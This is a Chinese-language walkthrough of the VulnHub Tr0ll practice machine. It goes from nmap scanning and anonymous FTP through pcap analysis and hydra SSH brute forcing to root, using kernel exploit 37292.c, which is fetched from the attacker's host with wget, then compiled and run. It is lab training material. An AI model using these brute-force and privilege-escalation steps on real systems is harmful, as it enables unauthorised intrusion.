Tr0ll靶场下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar
目标
拿下靶机root权限
本机IP:192.168.118.128
目标IP:192.168.118.0/24
信息收集
nmap探测存活主机,扫端口,扫服务
nmap -sP 192.168.118.0/24
nmap -p- 192.168.118.147
nmap -sV -A 192.168.118.147
第一步探测出靶机IP为192.168.118.147
探测出三个端口:21、22、80
发现21端口的ftp服务可以进行匿名登录
先访问web看一下,好吧,挺可爱的
匿名登录FTP
找到一个pcap文件,保存下来
使用 wireshark 查看
wireshark lol.pcap
分析pcap文件,追踪TCP流,在里面的得到一个提示,简单测试一下得到 sup3rs3cr3tdirlol 应该是一个后台目录
访问得到的目录:http://192.168.118.147/sup3rs3cr3tdirlol
里面有一个名为 roflmao 的文件,下载下来
查看文件类型,加权限,运行起来(这里有个问题是靶机下载的东西怎么能直接运行呢,不怕有危险吗??)
file roflmao
chmod 777 roflmao
./roflmao
运行结果提示我们应该找到一个新地址
访问目录:http://192.168.118.147/0x0856BF
里面有两个文件夹,打开第一个里面有一堆账号
第二个文件名就提示我们里面肯定存放有密码了,打开最终里面的内容是Good_job_:),但是后面测试发现是错误的,但密码肯定就是在这个文件里面的啊,最后发现存放这个密码的文档名居然是密码!!!密码为 Pass.txt
将前面发现的账户名整理下来,存为 user.txt
前面扫描出靶机是有开放22端口的ssh,使用九头蛇进行爆破
hydra -L user.txt -p 'Pass.txt' ssh://192.168.118.147
得到账号密码(overflow :Pass.txt)
使用ssh登录,然后上传脚本实现交互式shell
ssh overflow@192.168.118.147
python -c 'import pty;pty.spawn("/bin/bash")'
登录成功以后发现为普通账户,下一步肯定就是提权了
使用 uname -a 查询到版本信息为linux 3.13.0 ubuntu
内核漏洞提权
就第一个脚本拷贝到桌面
locate linux/local/37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop
将脚本上传到靶机的 /tmp 目录下,编译运行,提权成功
python -m http.server 80
wget 192.168.118.128:80/37292.c
gcc -o exp 37292.c
./exp